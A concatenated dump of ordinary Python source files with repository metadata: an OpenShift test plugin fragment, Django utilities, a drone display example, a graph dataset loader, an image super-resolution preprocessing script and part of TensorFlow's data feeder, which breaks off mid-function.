            display.info('Waiting for OpenShift service: %s' % endpoint, verbosity=1)
            try:
                client.get(endpoint)
                return
            except SubprocessError:
                pass
            time.sleep(10)
        raise ApplicationError('Timeout waiting for OpenShift service.')
    def _get_config(self, server):
        """Get OpenShift config from container.
        :type server: str
        :rtype: str
        """
        # Fix: docstring previously claimed dict[str, str]; this returns the
        # kubeconfig text with TLS verification disabled and the server rewritten.
        cmd = ['cat', '/var/lib/origin/openshift.local.config/master/admin.kubeconfig']
        stdout, dummy = docker_exec(self.args, self.container_name, cmd, capture=True)
        config = stdout
        config = re.sub(r'^( *)certificate-authority-data: .*$', r'\1insecure-skip-tls-verify: true', config, flags=re.MULTILINE)
        config = re.sub(r'^( *)server: .*$', r'\1server: %s' % server, config, flags=re.MULTILINE)
        return config
class OpenShiftCloudEnvironment(CloudEnvironment):
    """OpenShift cloud environment plugin. Updates integration test environment after delegation."""
    def configure_environment(self, env, cmd):
        """Expose the generated kubeconfig to the tests via K8S_AUTH_KUBECONFIG.

        :type env: dict[str, str]
        :type cmd: list[str]
        """
        env['K8S_AUTH_KUBECONFIG'] = self.config_path
| 32.804444 | 141 | 0.615364 |
acfb68f7be8fd4e69f5359bf73ddfdc4d4750494 | 665 | py | Python | manage.py | awhigham9/GatorWiki | 382bdacb86fccb1a365ffaed2cb5a86441e819e6 | [
"MIT"
] | 6 | 2021-09-09T20:38:24.000Z | 2021-10-06T03:51:40.000Z | manage.py | awhigham9/GatorWiki | 382bdacb86fccb1a365ffaed2cb5a86441e819e6 | [
"MIT"
] | 16 | 2021-09-17T17:02:27.000Z | 2021-11-07T17:46:41.000Z | manage.py | awhigham9/GatorWiki | 382bdacb86fccb1a365ffaed2cb5a86441e819e6 | [
"MIT"
] | 5 | 2021-09-09T20:38:27.000Z | 2021-09-24T17:33:23.000Z | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks for the gatorwiki Django project."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gatorwiki.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a friendlier hint while keeping the original cause.
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| 28.913043 | 73 | 0.679699 |
acfb693e5623104b21716be98a85348a928a8a0f | 447 | py | Python | portal/users/migrations/0007_auto_20210223_1901.py | LDSSA/portal | 9561da1e262678fe68dcf51c66007c0fb13eb51a | [
"MIT"
] | 2 | 2020-11-09T03:48:36.000Z | 2021-07-02T14:30:09.000Z | portal/users/migrations/0007_auto_20210223_1901.py | LDSSA/portal | 9561da1e262678fe68dcf51c66007c0fb13eb51a | [
"MIT"
] | 132 | 2020-04-25T15:57:56.000Z | 2022-03-10T19:15:51.000Z | portal/users/migrations/0007_auto_20210223_1901.py | LDSSA/portal | 9561da1e262678fe68dcf51c66007c0fb13eb51a | [
"MIT"
] | 1 | 2020-10-24T16:15:57.000Z | 2020-10-24T16:15:57.000Z | # Generated by Django 3.1.7 on 2021-02-23 19:01
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the ``users`` app (Django 3.1.7).

    Alters ``User.first_name`` to ``CharField(max_length=150, blank=True)``.
    """
    # Must be applied after users.0006_user_logo.
    dependencies = [
        ("users", "0006_user_logo"),
    ]
    operations = [
        migrations.AlterField(
            model_name="user",
            name="first_name",
            field=models.CharField(
                blank=True, max_length=150, verbose_name="first name"
            ),
        ),
    ]
| 21.285714 | 69 | 0.565996 |
acfb69f3995d23c43850a5277464921d788fd5c5 | 578 | py | Python | common/validators.py | opendream/asip | 20583aca6393102d425401d55ea32ac6b78be048 | [
"MIT"
] | null | null | null | common/validators.py | opendream/asip | 20583aca6393102d425401d55ea32ac6b78be048 | [
"MIT"
] | 8 | 2020-03-24T17:11:49.000Z | 2022-01-13T01:18:11.000Z | common/validators.py | opendream/asip | 20583aca6393102d425401d55ea32ac6b78be048 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import resolve, Resolver404
def validate_reserved_url(value, resp=False):
    """Validate that a permalink slug does not shadow a reserved URL.

    A slug is acceptable when '/<value>/' does not resolve at all, or when it
    resolves to one of the views listed in settings.OWNER_URL_VIEWS.

    Args:
        value: Permalink slug to check.
        resp: When truthy, return False instead of raising on a clash.

    Returns:
        True when the slug is acceptable; False only when ``resp`` is truthy
        and the slug clashes.

    Raises:
        ValidationError: When the slug clashes and ``resp`` is falsy.
    """
    try:
        handler, _args, _kwargs = resolve('/%s/' % value)
    except Resolver404:
        return True
    # NOTE(review): 'func_name' is a Python 2 function attribute — confirm
    # this still resolves on the Python/Django versions in use.
    if handler.func_name in settings.OWNER_URL_VIEWS:
        return True
    if resp:
        return False
    raise ValidationError(_('This permalink is already in use'), params={'value': value})
acfb6a0f1d891e3ccc31cfd1f9d0cb9dcaa303c5 | 1,086 | py | Python | 11_display/eg_11_10_display_draw_string_align.py | byrobot-python/e_drone_examples | fca3ef69f45299f0e80df52ac303e2a1388b2b61 | [
"MIT"
] | null | null | null | 11_display/eg_11_10_display_draw_string_align.py | byrobot-python/e_drone_examples | fca3ef69f45299f0e80df52ac303e2a1388b2b61 | [
"MIT"
] | null | null | null | 11_display/eg_11_10_display_draw_string_align.py | byrobot-python/e_drone_examples | fca3ef69f45299f0e80df52ac303e2a1388b2b61 | [
"MIT"
] | null | null | null | import random
from time import sleep
from e_drone.drone import *
from e_drone.protocol import *
if __name__ == '__main__':
    # Example: repeatedly draw the string "LOVE" at random positions on the
    # controller display of a BYROBOT e-drone.
    drone = Drone()
    drone.open()
    # Request header addressed from the base unit to the controller.
    header = Header()
    header.data_type = DataType.DISPLAY_DRAW_STRING_ALIGN
    header.length = DisplayDrawStringAlign.get_size()
    header.from_ = DeviceType.BASE
    header.to_ = DeviceType.CONTROLLER
    request = DisplayDrawStringAlign()
    for iteration in range(100):
        # Randomize vertical placement and rendering attributes per frame.
        request.x_start = 0
        request.x_end = 127
        request.y = random.randint(0, 63)
        request.align = DisplayAlign(random.randint(0, 2))
        request.font = DisplayFont(random.randint(0, 1))
        request.pixel = DisplayPixel(random.randint(0, 1))
        request.message = "LOVE"
        header.length = DisplayDrawStringAlign.get_size() + len(request.message)
        response = drone.transfer(header, request)
        print("{0} / {1}".format(iteration, convert_byte_array_to_string(response)))
        sleep(0.03)
    drone.close()
acfb6afc5d78a3e4ea07b92db60d93bf5c04aef6 | 6,742 | py | Python | bindings/python/ensmallen_graph/datasets/string/prevotellastercorea.py | caufieldjh/ensmallen_graph | 14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a | [
"MIT"
] | null | null | null | bindings/python/ensmallen_graph/datasets/string/prevotellastercorea.py | caufieldjh/ensmallen_graph | 14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a | [
"MIT"
] | null | null | null | bindings/python/ensmallen_graph/datasets/string/prevotellastercorea.py | caufieldjh/ensmallen_graph | 14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a | [
"MIT"
] | null | null | null | """
This file offers the methods to automatically retrieve the graph Prevotella stercorea.
The graph is automatically retrieved from the STRING repository.
Report
---------------------
At the time of rendering these methods (please see datetime below), the graph
had the following characteristics:
Datetime: 2021-02-02 22:07:10.070563
The undirected graph Prevotella stercorea has 2962 nodes and 149720 weighted
edges, of which none are self-loops. The graph is dense as it has a density
of 0.03414 and has 38 connected components, where the component with most
nodes has 2857 nodes and the component with the least nodes has 2 nodes.
The graph median node degree is 75, the mean node degree is 101.09, and
the node degree mode is 3. The top 5 most central nodes are 1002367.HMPREF0673_00915
(degree 885), 1002367.HMPREF0673_02100 (degree 834), 1002367.HMPREF0673_02060
(degree 696), 1002367.HMPREF0673_00648 (degree 695) and 1002367.HMPREF0673_02386
(degree 648).
References
---------------------
Please cite the following if you use the data:
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
Usage example
----------------------
The usage of this graph is relatively straightforward:
.. code:: python
# First import the function to retrieve the graph from the datasets
from ensmallen_graph.datasets.string import PrevotellaStercorea
# Then load the graph
graph = PrevotellaStercorea()
# Finally, you can do anything with it, for instance, compute its report:
print(graph)
# If you need to run a link prediction task with validation,
# you can split the graph using a connected holdout as follows:
train_graph, validation_graph = graph.connected_holdout(
# You can use an 80/20 split the holdout, for example.
train_size=0.8,
# The random state is used to reproduce the holdout.
random_state=42,
# Wether to show a loading bar.
verbose=True
)
# Remember that, if you need, you can enable the memory-time trade-offs:
train_graph.enable(
vector_sources=True,
vector_destinations=True,
vector_outbounds=True
)
# Consider using the methods made available in the Embiggen package
# to run graph embedding or link prediction tasks.
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen_graph import EnsmallenGraph # pylint: disable=import-error
def PrevotellaStercorea(
    directed: bool = False,
    verbose: int = 2,
    cache_path: str = "graphs/string",
    **additional_graph_kwargs: Dict
) -> EnsmallenGraph:
    """Return the Prevotella stercorea graph, retrieved from the STRING repository.

    The undirected graph has 2962 nodes and 149720 weighted edges (no
    self-loops), a density of 0.03414 and 38 connected components; the largest
    component holds 2857 nodes. Please cite Szklarczyk et al., "STRING v11",
    Nucleic Acids Research 47(D1), 2019, when using the data.

    Parameters
    -------------------
    directed: bool = False,
        Whether to load the graph as directed or undirected.
    verbose: int = 2,
        Whether to show loading bars during the retrieval and building
        of the graph.
    cache_path: str = "graphs/string",
        Where to store the downloaded graphs.
    additional_graph_kwargs: Dict,
        Additional graph kwargs.

    Returns
    -----------------------
    Instance of Prevotella stercorea graph.
    """
    retriever = AutomaticallyRetrievedGraph(
        graph_name="PrevotellaStercorea",
        dataset="string",
        directed=directed,
        verbose=verbose,
        cache_path=cache_path,
        additional_graph_kwargs=additional_graph_kwargs
    )
    return retriever()
| 35.298429 | 223 | 0.706022 |
acfb6b340bc5088de9a020fcf907f83beb45e702 | 4,347 | py | Python | codes/preprocess/create_bicubic_dataset.py | YamSquirrel/realsr_test | 60c52cfc7091eeeff0b8d25c4fd3819584517212 | [
"Apache-2.0"
] | 1 | 2022-03-15T07:42:53.000Z | 2022-03-15T07:42:53.000Z | codes/preprocess/create_bicubic_dataset.py | openmynet/realsr_test | 60c52cfc7091eeeff0b8d25c4fd3819584517212 | [
"Apache-2.0"
] | null | null | null | codes/preprocess/create_bicubic_dataset.py | openmynet/realsr_test | 60c52cfc7091eeeff0b8d25c4fd3819584517212 | [
"Apache-2.0"
] | 1 | 2022-03-15T07:42:47.000Z | 2022-03-15T07:42:47.000Z | import argparse
import os
import torch.utils.data
import yaml
import utils
from PIL import Image
import torchvision.transforms.functional as TF
from tqdm import tqdm
# Command-line options selecting the dataset/track to process and the bicubic
# scaling factors used when generating the paired HR/LR images.
parser = argparse.ArgumentParser(description='Apply the trained model to create a dataset')
parser.add_argument('--checkpoint', default=None, type=str, help='checkpoint model to use')
parser.add_argument('--artifacts', default='', type=str, help='selecting different artifacts type')
parser.add_argument('--name', default='', type=str, help='additional string added to folder path')
parser.add_argument('--dataset', default='df2k', type=str, help='selecting different datasets')
parser.add_argument('--track', default='train', type=str, help='selecting train or valid track')
parser.add_argument('--num_res_blocks', default=8, type=int, help='number of ResNet blocks')
parser.add_argument('--cleanup_factor', default=2, type=int, help='downscaling factor for image cleanup')
parser.add_argument('--upscale_factor', default=4, type=int, choices=[4], help='super resolution upscale factor')
opt = parser.parse_args()
# Fix for the yaml.load "missing Loader" error: https://blog.csdn.net/qq_34495095/article/details/120905179
# d1=yaml.load(file,Loader=yaml.FullLoader)
# d1=yaml.safe_load(file)
# d1 = yaml.load(file, Loader=yaml.CLoader)
# define input and target directories
with open('paths_test.yml', 'r') as stream:
    PATHS = yaml.load(stream,Loader=yaml.FullLoader)
# Resolve the source (HR) directory — and, for df2k, a separate target
# directory — from the paths config for the chosen dataset.
if opt.dataset == 'df2k':
    path_sdsr = PATHS['datasets']['df2k'] + '/generated/sdsr/'
    path_tdsr = PATHS['datasets']['df2k'] + '/generated/tdsr/'
    input_source_dir = PATHS['df2k']['tdsr']['source']
    input_target_dir = PATHS['df2k']['tdsr']['target']
    source_files = [os.path.join(input_source_dir, x) for x in os.listdir(input_source_dir) if utils.is_image_file(x)]
    target_files = [os.path.join(input_target_dir, x) for x in os.listdir(input_target_dir) if utils.is_image_file(x)]
else:
    path_sdsr = PATHS['datasets'][opt.dataset] + '/generated/' + opt.artifacts + '/' + opt.track + opt.name + '_sdsr/'
    path_tdsr = PATHS['datasets'][opt.dataset] + '/generated/' + opt.artifacts + '/' + opt.track + opt.name + '_tdsr/'
    input_source_dir = PATHS[opt.dataset][opt.artifacts]['hr'][opt.track]
    input_target_dir = None
    source_files = [os.path.join(input_source_dir, x) for x in os.listdir(input_source_dir) if utils.is_image_file(x)]
    target_files = []
# Output layout: <path_tdsr>/HR holds the (cleaned) high-res images, LR the
# bicubic downscales. (path_sdsr is computed but not used in this script.)
tdsr_hr_dir = path_tdsr + 'HR'
tdsr_lr_dir = path_tdsr + 'LR'
assert os.path.exists(PATHS['datasets'][opt.dataset])
if not os.path.exists(tdsr_hr_dir):
    os.makedirs(tdsr_hr_dir)
if not os.path.exists(tdsr_lr_dir):
    os.makedirs(tdsr_lr_dir)
# generate the noisy images
with torch.no_grad():
    # Source images: downscale by cleanup_factor, crop to a multiple of
    # upscale_factor, save as HR, then bicubic-downscale again for LR.
    for file in tqdm(source_files, desc='Generating images from source'):
        # load HR image
        input_img = Image.open(file)
        input_img = TF.to_tensor(input_img)
        # Resize HR image to clean it up and make sure it can be resized again
        resize2_img = utils.imresize(input_img, 1.0 / opt.cleanup_factor, True)
        _, w, h = resize2_img.size()
        w = w - w % opt.upscale_factor
        h = h - h % opt.upscale_factor
        resize2_cut_img = resize2_img[:, :w, :h]
        # Save resize2_cut_img as HR image for TDSR
        path = os.path.join(tdsr_hr_dir, os.path.basename(file))
        TF.to_pil_image(resize2_cut_img).save(path, 'PNG')
        # Generate resize3_cut_img and apply model
        resize3_cut_img = utils.imresize(resize2_cut_img, 1.0 / opt.upscale_factor, True)
        # Save resize3_cut_noisy_img as LR image for TDSR
        path = os.path.join(tdsr_lr_dir, os.path.basename(file))
        TF.to_pil_image(resize3_cut_img).save(path, 'PNG')
    # Target images: saved as HR unmodified; LR is a single bicubic downscale.
    for file in tqdm(target_files, desc='Generating images from target'):
        # load HR image
        input_img = Image.open(file)
        input_img = TF.to_tensor(input_img)
        # Save input_img as HR image for TDSR
        path = os.path.join(tdsr_hr_dir, os.path.basename(file))
        TF.to_pil_image(input_img).save(path, 'PNG')
        # generate resized version of input_img
        resize_img = utils.imresize(input_img, 1.0 / opt.upscale_factor, True)
        # Save resize_noisy_img as LR image for TDSR
        path = os.path.join(tdsr_lr_dir, os.path.basename(file))
        TF.to_pil_image(resize_img).save(path, 'PNG')
| 45.28125 | 118 | 0.703474 |
acfb6b48a9b1a181d731d5fa486e67d3048a28f8 | 20,420 | py | Python | tensorflow/contrib/learn/python/learn/io/data_feeder.py | cedias/tensorflow | ede4b4c111ebd2b96703dce42f0f7c5f2173f0e7 | [
"Apache-2.0"
] | 2 | 2017-06-29T11:50:27.000Z | 2019-10-15T18:55:28.000Z | tensorflow/contrib/learn/python/learn/io/data_feeder.py | cedias/tensorflow | ede4b4c111ebd2b96703dce42f0f7c5f2173f0e7 | [
"Apache-2.0"
] | null | null | null | tensorflow/contrib/learn/python/learn/io/data_feeder.py | cedias/tensorflow | ede4b4c111ebd2b96703dce42f0f7c5f2173f0e7 | [
"Apache-2.0"
] | 8 | 2017-04-17T23:39:12.000Z | 2019-05-11T14:06:31.000Z | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementations of different data feeders to provide data for TF trainer."""
# TODO(ipolosukhin): Replace this module with feed-dict queue runners & queues.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import math
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
# pylint: disable=g-multiple-import,g-bad-import-order
from .pandas_io import HAS_PANDAS, extract_pandas_data, extract_pandas_matrix, extract_pandas_labels
from .dask_io import HAS_DASK, extract_dask_data, extract_dask_labels
# pylint: enable=g-multiple-import,g-bad-import-order
def _get_in_out_shape(x_shape, y_shape, n_classes, batch_size=None):
"""Returns shape for input and output of the data feeder."""
if batch_size is None:
batch_size = x_shape[0]
elif batch_size <= 0:
raise ValueError('Invalid batch_size %d.' % batch_size)
x_shape = list(x_shape[1:]) if len(x_shape) > 1 else [1]
input_shape = [batch_size] + x_shape
if y_shape is None:
return input_shape, None, batch_size
y_shape = list(y_shape[1:]) if len(y_shape) > 1 else []
# Skip first dimension if it is 1.
if y_shape and y_shape[0] == 1:
y_shape = y_shape[1:]
if n_classes is not None and n_classes > 1:
output_shape = [batch_size] + y_shape + [n_classes]
else:
output_shape = [batch_size] + y_shape
return input_shape, output_shape, batch_size
def _data_type_filter(x, y):
  """Filter data types into acceptable format.

  Dask containers are unwrapped first, then pandas containers; `y` is only
  converted when it is not None.
  """
  converters = (
      (HAS_DASK, extract_dask_data, extract_dask_labels),
      (HAS_PANDAS, extract_pandas_data, extract_pandas_labels),
  )
  for available, convert_x, convert_y in converters:
    if available:
      x = convert_x(x)
      if y is not None:
        y = convert_y(y)
  return x, y
def _is_iterable(x):
return hasattr(x, 'next') or hasattr(x, '__next__')
def setup_train_data_feeder(
    x, y, n_classes, batch_size=None, shuffle=True, epochs=None):
  """Create data feeder, to sample inputs from dataset.

  If `x` and `y` are iterators, use `StreamingDataFeeder`.

  Args:
    x: numpy, pandas or Dask matrix or iterable.
    y: numpy, pandas or Dask array or iterable.
    n_classes: number of classes.
    batch_size: size to split data into parts. Must be >= 1.
    shuffle: Whether to shuffle the inputs.
    epochs: Number of epochs to run.

  Returns:
    DataFeeder object that returns training data.

  Raises:
    ValueError: if one of `x` and `y` is iterable and the other is not.
  """
  x, y = _data_type_filter(x, y)
  if HAS_DASK:
    # pylint: disable=g-import-not-at-top
    import dask.dataframe as dd
    # Dask inputs (both x and y, when y is given) get the Dask-aware feeder;
    # anything else falls through to the in-memory DataFeeder.
    if (isinstance(x, (dd.Series, dd.DataFrame)) and
        (y is None or isinstance(y, (dd.Series, dd.DataFrame)))):
      data_feeder_cls = DaskDataFeeder
    else:
      data_feeder_cls = DataFeeder
  else:
    data_feeder_cls = DataFeeder

  if _is_iterable(x):
    if y is not None and not _is_iterable(y):
      raise ValueError('Both x and y should be iterators for '
                       'streaming learning to work.')
    # Streaming feeder consumes the iterators directly; note that `shuffle`
    # and `epochs` are not forwarded in this path.
    return StreamingDataFeeder(x, y, n_classes, batch_size)
  return data_feeder_cls(
      x, y, n_classes, batch_size, shuffle=shuffle, epochs=epochs)
def _batch_data(x, batch_size=None):
if (batch_size is not None) and (batch_size <= 0):
raise ValueError('Invalid batch_size %d.' % batch_size)
chunk = []
for data in x:
chunk.append(data)
if (batch_size is not None) and (len(chunk) >= batch_size):
yield np.matrix(chunk)
chunk = []
yield np.matrix(chunk)
def setup_predict_data_feeder(x, batch_size=None):
  """Returns an iterable for feeding into predict step.

  Args:
    x: numpy, pandas, Dask array or iterable.
    batch_size: Size of batches to split data into.
      If `None`, returns one batch of full size.

  Returns:
    List or iterator of parts of data to predict on.

  Raises:
    ValueError: if `batch_size` <= 0.
  """
  if HAS_DASK:
    x = extract_dask_data(x)
  if HAS_PANDAS:
    x = extract_pandas_data(x)
  if _is_iterable(x):
    # Iterator input: stream lazily via the generator-based batcher.
    return _batch_data(x, batch_size)
  if len(x.shape) == 1:
    # Promote a 1-D vector to a single-column matrix.
    x = np.reshape(x, (-1, 1))
  if batch_size is not None:
    if batch_size <= 0:
      raise ValueError('Invalid batch_size %d.' % batch_size)
    # Ceil division: the last batch may be shorter than batch_size.
    n_batches = int(math.ceil(float(len(x)) / batch_size))
    return [x[i * batch_size:(i + 1) * batch_size] for i in xrange(n_batches)]
  return [x]
def setup_processor_data_feeder(x):
  """Sets up processor iterable.

  Args:
    x: numpy, pandas or iterable.

  Returns:
    Iterable of data to process.
  """
  # Pandas inputs are unwrapped to their underlying matrix; everything else
  # passes through untouched.
  return extract_pandas_matrix(x) if HAS_PANDAS else x
def check_array(array, dtype):
  """Coerces `array` to `dtype` when it is a plain ndarray or list.

  Args:
    array: Input array.
    dtype: Expected dtype.

  Returns:
    Original array or converted.
  """
  # Instances of other classes (e.g. h5py.Dataset) are returned untouched so
  # that the whole dataset is not copied/loaded into memory for a dtype check.
  if not isinstance(array, (np.ndarray, list)):
    return array
  return np.array(array, dtype=dtype, order=None, copy=False)
class DataFeeder(object):
  """Data feeder is an example class to sample data for TF trainer.

  Parameters:
    x: feature Nd numpy matrix of shape [n_samples, n_features, ...].
    y: target vector, either floats for regression or class id for
      classification. If matrix, will consider as a sequence
      of targets. Can be None for unsupervised setting.
    n_classes: number of classes, 0 and 1 are considered regression, None will
      pass through the input labels without one-hot conversion.
    batch_size: mini batch size to accumulate.
    random_state: numpy RandomState object to reproduce sampling.

  Attributes:
    x: input features.
    y: input target.
    n_classes: number of classes (if None, pass through indices without
      one-hot conversion).
    batch_size: mini batch size to accumulate.
    input_shape: shape of the input.
    output_shape: shape of the output.
    input_dtype: dtype of input.
    output_dtype: dtype of output.
  """

  def __init__(
      self, x, y, n_classes, batch_size=None, shuffle=True, random_state=None,
      epochs=None):
    # Features keep int64 only when already int64; everything else is coerced
    # to float32. Targets become int64 when they will be one-hot encoded.
    x_dtype = np.int64 if x.dtype == np.int64 else np.float32
    y_dtype = (
        np.int64 if n_classes is not None and n_classes > 1 else np.float32)
    self.x = check_array(x, dtype=x_dtype)
    # self.n_classes is None means we're passing in raw target indices
    if n_classes is not None:
      self.y = (None if y is None else check_array(y, dtype=y_dtype))
    else:
      self.y = y
    if isinstance(self.y, list):
      self.y = np.array(y)
    self.n_classes = n_classes
    self.max_epochs = epochs
    self.input_shape, self.output_shape, self._batch_size = _get_in_out_shape(
        self.x.shape, None if self.y is None else self.y.shape, n_classes,
        batch_size)
    # Input dtype matches dtype of x.
    self.input_dtype = x_dtype
    # self.n_classes is None means we're passing in raw target indices
    if n_classes is not None or y is None:
      self.output_dtype = np.float32
    else:
      self.output_dtype = self.y.dtype
    self.shuffle = shuffle
    # Fixed seed 42 by default so sampling is reproducible across runs.
    self.random_state = np.random.RandomState(
        42) if random_state is None else random_state
    if self.shuffle:
      self.indices = self.random_state.permutation(self.x.shape[0])
    else:
      self.indices = np.array(range(self.x.shape[0]))
    # Cursor into self.indices; epoch counter; placeholder set lazily by
    # make_epoch_variable().
    self.offset = 0
    self.epoch = 0
    self._epoch_placeholder = None

  @property
  def batch_size(self):
    # Read-only view of the resolved batch size (may equal the dataset size
    # when batch_size=None was passed).
    return self._batch_size

  def make_epoch_variable(self):
    """Adds a placeholder variable for the epoch to the graph.

    Returns:
      The epoch placeholder.
    """
    self._epoch_placeholder = array_ops.placeholder(dtypes.int32, [1],
                                                    name='epoch')
    return self._epoch_placeholder

  def input_builder(self):
    """Builds inputs in the graph.

    Returns:
      Two placeholders for inputs and outputs.
    """
    # Leading dimension is None so the last (shorter) batch of an epoch can
    # still be fed.
    input_shape = [None] + self.input_shape[1:]
    self._input_placeholder = array_ops.placeholder(
        dtypes.as_dtype(self.input_dtype),
        input_shape,
        name='input')
    if self.output_shape is None:
      self._output_placeholder = None
    else:
      output_shape = [None] + self.output_shape[1:]
      self._output_placeholder = array_ops.placeholder(
          dtypes.as_dtype(self.output_dtype),
          output_shape,
          name='output')
    return self._input_placeholder, self._output_placeholder

  def set_placeholders(self, input_placeholder, output_placeholder):
    """Sets placeholders for this data feeder.

    Args:
      input_placeholder: Placeholder for `x` variable. Should match shape
        of the examples in the x dataset.
      output_placeholder: Placeholder for `y` variable. Should match
        shape of the examples in the y dataset. Can be None.
    """
    self._input_placeholder = input_placeholder
    self._output_placeholder = output_placeholder

  def get_feed_params(self):
    """Function returns a dict with data feed params while training.

    Returns:
      A dict with data feed params while training.
    """
    return {
        'epoch': self.epoch,
        'offset': self.offset,
        'batch_size': self._batch_size
    }

  def get_feed_dict_fn(self):
    """Returns a function that samples data into given placeholders.

    Returns:
      A function that when called samples a random subset of batch size
      from x and y.
    """
    def _feed_dict_fn():
      """Function that samples data into given placeholders."""
      # Signal end-of-input once max_epochs is exhausted.
      if self.max_epochs is not None and self.epoch + 1 > self.max_epochs:
        raise StopIteration
      assert self._input_placeholder is not None
      feed_dict = {}
      if self._epoch_placeholder is not None:
        feed_dict[self._epoch_placeholder.name] = [self.epoch]

      # Take next batch of indices (the last batch of an epoch may be short).
      end = min(self.x.shape[0], self.offset + self._batch_size)
      batch_indices = self.indices[self.offset:end]

      # Assign input features from random indices.
      inp = (
          np.array(self.x[batch_indices]).reshape((batch_indices.shape[0], 1))
          if len(self.x.shape) == 1 else self.x[batch_indices])
      feed_dict[self._input_placeholder.name] = inp

      # move offset and reset it if necessary; reshuffle at each epoch end
      self.offset += self._batch_size
      if self.offset >= self.x.shape[0]:
        self.indices = self.random_state.permutation(self.x.shape[0])
        self.offset = 0
        self.epoch += 1

      # return early if there are no labels
      if self._output_placeholder is None:
        return feed_dict

      # assign labels from random indices
      self.output_shape[0] = batch_indices.shape[0]
      out = np.zeros(self.output_shape, dtype=self.output_dtype)
      for i in xrange(out.shape[0]):
        sample = batch_indices[i]
        # self.n_classes is None means we're passing in raw target indices
        if self.n_classes is None:
          out[i] = self.y[sample]
        else:
          if self.n_classes > 1:
            # One-hot encode class ids (2-D output) or sequences of class
            # ids (3-D output).
            if len(self.output_shape) == 2:
              out.itemset((i, self.y[sample]), 1.0)
            else:
              for idx, value in enumerate(self.y[sample]):
                out.itemset(tuple([i, idx, value]), 1.0)
          else:
            out[i] = self.y[sample]
      feed_dict[self._output_placeholder.name] = out
      return feed_dict

    return _feed_dict_fn
class StreamingDataFeeder(DataFeeder):
  """Data feeder for TF trainer that reads data from iterator.

  Streaming data feeder allows to read data as it comes it from disk or
  somewhere else. It's custom to have this iterators rotate infinetly over
  the dataset, to allow control of how much to learn on the trainer side.

  Parameters:
    x: iterator that returns for each element, returns features.
    y: iterator that returns for each element, returns 1 or many classes /
       regression values.
    n_classes: indicator of how many classes the target has.
    batch_size: Mini batch size to accumulate.

  Attributes:
    x: input features.
    y: input target.
    n_classes: number of classes.
    batch_size: mini batch size to accumulate.
    input_shape: shape of the input.
    output_shape: shape of the output.
    input_dtype: dtype of input.
    output_dtype: dtype of output.
  """

  def __init__(self, x, y, n_classes, batch_size):
    # pylint: disable=invalid-name,super-init-not-called
    # Peek at the first element of each stream to learn shapes/dtypes, then
    # chain it back on so the stream is not consumed.
    x_first_el = six.next(x)
    self.x = itertools.chain([x_first_el], x)
    if y is not None:
      y_first_el = six.next(y)
      self.y = itertools.chain([y_first_el], y)
    else:
      y_first_el = None
      self.y = None
    self.n_classes = n_classes
    self.input_shape, self.output_shape, self._batch_size = _get_in_out_shape(
        [1] + list(x_first_el.shape),
        [1] + list(y_first_el.shape) if y is not None else None,
        n_classes,
        batch_size)
    self.input_dtype = x_first_el.dtype
    # Convert float64 to float32, as all the parameters in the model are
    # floats32 and there is a lot of benefits in using it in NNs.
    if self.input_dtype == np.float64:
      self.input_dtype = np.float32
    # Output types are floats, due to both softmaxes and regression req.
    if n_classes is not None and n_classes > 0:
      self.output_dtype = np.float32
    elif y is not None:
      # Infer the target dtype from the first element (or its first item,
      # for list/array-valued targets).
      if isinstance(y_first_el, list) or isinstance(y_first_el, np.ndarray):
        self.output_dtype = np.dtype(type(y_first_el[0]))
      else:
        self.output_dtype = np.dtype(type(y_first_el))

  def get_feed_params(self):
    """Function returns a dict with data feed params while training.

    Returns:
      A dict with data feed params while training.
    """
    return {'batch_size': self._batch_size}

  def get_feed_dict_fn(self):
    """Returns a function, that will sample data and provide it to placeholders.

    Returns:
      A function that when called samples a random subset of batch size
      from x and y.
    """
    self.stopped = False

    def _feed_dict_fn():
      """Samples data and provides it to placeholders.

      Returns:
        Dict of input and output tensors.
      """
      if self.stopped:
        raise StopIteration
      inp = np.zeros(self.input_shape, dtype=self.input_dtype)
      if self.y is not None:
        out = np.zeros(self.output_shape, dtype=self.output_dtype)
      for i in xrange(self._batch_size):
        # Add handling when queue ends. On exhaustion, truncate the batch to
        # the rows actually filled and remember that we stopped.
        try:
          inp[i, :] = six.next(self.x)
        except StopIteration:
          self.stopped = True
          inp = inp[:i, :]
          if self.y is not None:
            out = out[:i]
          break

        if self.y is not None:
          y = six.next(self.y)
          if self.n_classes is not None and self.n_classes > 1:
            # One-hot encode class id(s), mirroring DataFeeder's behavior.
            if len(self.output_shape) == 2:
              out.itemset((i, y), 1.0)
            else:
              for idx, value in enumerate(y):
